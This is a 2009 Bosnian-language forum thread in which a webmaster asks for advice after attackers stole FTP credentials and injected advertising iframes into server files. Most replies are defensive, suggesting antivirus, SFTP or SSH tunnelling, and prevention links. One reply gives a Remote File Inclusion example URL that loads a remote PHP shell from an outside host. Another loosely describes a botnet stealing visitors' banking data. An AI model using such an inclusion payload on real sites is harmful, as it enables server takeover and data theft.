Preskoči na sadržaj
Ista raja. Nova runda.
GAMERZ.ba — REBORN
Diskusija

Web sigurnost, iframe, malware ?!

128 pregleda · 10 odgovora · otvorena 15.12.2009. u 17:50

Pozdrav....
Zanimaju me Vaše preporuke savjeti .. etc .. u vezi web sigurnosti... tacnije "novih" iframe napada ...

U ovom slucaju prvi propust je na mom/nasem PC-u .. jer 3-ca osoba uspjesno grabi ftp informacije i uspijesno edituje fajlove na serveru ubacivajuci u svaki index.php/html.... default.php... iframe kojim reklamira neku stranicu (npr za prodaju Bozicnih poklona) ... nebitno ... uglavnom za par minuta je moguce zaraziti(editovati) 10-ak hiljada fajlova .. na serveru .. sto je nemoguce rucno editovati i pobrisati .. kod ...

Konkretno me zanima koje programe koristite za zastitu samog PC-a od malware-a, spy-a, i svih ostalih parazita ...
Kako koristite ftp konekciju .. da li postoji neki kriptovani nacin konekcije ... na ftp ... nezz bas puno o tome .. koristim filezillu, i imam velikih problema sa iframe napadima ...

... molim sva iskustva .. saznanja ... savjete .. iznesite slobodno ...
pozz:|
Ne koristim ... nikakav ftp ... ali kao zaštitu koristim .... Zone Alarm + AV .... tj. AVG ...

pozz




koristim samo anti virus - NOD 32 dobro me sluzi ne treba nista vise xD
Zdravo, sto se tice tog iframe napada cuo sam za to ima par mjeseci. To mi se desilo kolegi, tj. sajt mu je bio zarazen bas tim moronskim reklamama. Neznam tacno kako se izvodi napad, ali posljedice su za kosu pocupati.

Sto se tice " malware-a, spy-a, i svih ostalih parazita ... "...
Imas dosta dobrih antivirusa i aplikacija koje se brinu za to,
potrazi malo po google.

Vezano za ftp, da bi imao sto sigurniju konekciju mozes koristiti SSH da tunelujes konekciju sa FTP serverom, ili mozes
koristiti SFTP aplikacije/servere.

Ovdje imas riješenje svojih problema:

http://www.gotroot.com/tiki-read_article.php?articleId=278

Imas i ovdje dosta informacija :

http://www.amitbhawani.com/help/topic/how-to-pevent-iframe-injection
4rm4n1 je napisao/la:
Ne koristim ... nikakav ftp ... ali kao zaštitu koristim .... Zone Alarm + AV .... tj. AVG ...

pozz




:-X
mislis ne radis nikakve web stranice, pa iz tog razloga ne koristis ftp ...

u sustini ovo je virus/malware koji je nevidljiv ... tesko ga prpoznaju nod, malwarebytes .. (kod mene nije obrisan) ...
naravno na procesima se nista ne vidi ...

btw molio bih nekog ko je dugo u "web svijetu" ... i slucajno ima iskustva sa slicnim problemom .. da iznese svoj prijedlog/savj...
Ne koristim nikakvu zaštitu, imam mozak.
Jedino što imam na PC-u je keyscrambler koji me 'čuva' od keyloggera od kojeg se ne mogu čuvati ako naletim na njega , mada je to danas rijetkost, prevaziđen je koliko-toliko.

Mislim da je najbolje koristiti program koji briše sve nastale programe nakog ponovnog start-up-a.
KRYSTAL je napisao/la:
Ne koristim nikakvu zaštitu, imam mozak.
Jedino što imam na PC-u je keyscrambler koji me 'čuva' od keyloggera od kojeg se ne mogu čuvati ako naletim na njega , mada je to danas rijetkost, prevaziđen je koliko-toliko.

Mislim da je najbolje koristiti program koji briše sve nastale programe nakog ponovnog start-up-a.
OK .. nasao sam program koji si naveo ....
Jedino me brine to sto u pitanju nije klasicni keylogger ...

u pitanju su keylogeri laicki receno "moderniji" ... jer koliko znam iframe napadi su "nova furka" ... bar se meni nije desavalo proteklih 2-3 god ...

takodje guglajuci o ovom problemu .. upratio sam da malware kupi podatke iz programa (njegove baze) .. npr filezilla... etc .. zbog tog me brine ucinkovitost programa..

hvala u svakom slucaju .. ako imas jos neki savjet ... pucaj :)
splat je napisao/la:
OK .. nasao sam program koji si naveo ....
Jedino me brine to sto u pitanju nije klasicni keylogger ...

u pitanju su keylogeri laicki receno "moderniji" ... jer koliko znam iframe napadi su "nova furka" ... bar se meni nije desavalo proteklih 2-3 god ...

takodje guglajuci o ovom problemu .. upratio sam da malware kupi podatke iz programa (njegove baze) .. npr filezilla... etc .. zbog tog me brine ucinkovitost programa..

hvala u svakom slucaju .. ako imas jos neki savjet ... pucaj
haveru imas RFI propust u CMS i samo GETuje shell


npr


index.php?page=http://domena.com/shell.txt


i onda ubaci ti neku php skriptu i sve pojebe



A antivirus nikakav ne koristim koji ce mi qrac kad sam instaliro avg poceo pistat tamo sistemske fajlove lola poceo brisat j**o anti virus ja ga samo instaliram kada mi neko uleti u pc hahaha ali i za to ima lijek diskonektujem se XD


Joj spY sram te bilo sta to ljudima radis

a imo sam ja neki program neki backup koji je djavo upalim pc skinem film s neta pregledam sjebem sav pc nema sta mu ne uradim restartujem pc sve kosto je bilo ali nema ni filma moro sam tada rusit system jer se taj program nije mogo izbrsat opet ga vrati kad restartujem pc
UnDeRgRoUnD_cs_ je napisao/la:
haveru imas RFI propust u CMS i samo GETuje shell


npr


index.php?page=http://domena.com/shell.txt


i onda ubaci ti neku php skriptu i sve pojebe



A antivirus nikakav ne koristim koji ce mi qrac kad sam instaliro avg poceo pistat tamo sistemske fajlove lola poceo brisat j**o anti virus :D ja ga samo instaliram kada mi neko uleti u pc hahaha :D ali i za to ima lijek diskonektujem se XD


Joj spY sram te bilo sta to ljudima radis :D

a imo sam ja neki program neki backup koji je djavo upalim pc skinem film s neta pregledam sjebem sav pc nema sta mu ne uradim restartujem pc sve kosto je bilo :D ali nema ni filma moro sam tada rusit system jer se taj program nije mogo izbrsat opet ga vrati kad restartujem pc :D
Samo kad bi znali jos sto je Remote File Inclusion..
_InfinitY je napisao/la:
Samo kad bi znali jos sto je Remote File Inclusion..
a da objasnis malo ? :|
splat je napisao/la:
a da objasnis malo ? :|
Pa obični web vuln just like SQL injection i LFI ... Možeš googlati " How to fix RFI vulnerability "

I ne obraćaj pažnju na ovog Underground_CS , on misli da ti neko ubaca shell na website pa da ti dloaduje db i fajlove. lol

anyway,

Kinezi su kodirali jedan dobar botnet. Uglavnom radi na principu da zarazi sve sajtove na serveru i da uz'ma samo od posjetitelja sajta podatke od PayPal accounta , bank accounta ... etc , onog što je vrijedno tako da ne moraš se brinut' da li bi ti neko deface site. Taj botnet je nešto poput zeusa ( ako ne znaš šta je zeus botnet google it ) ...

Prijavi se da bi odgovorio/la na ovu temu.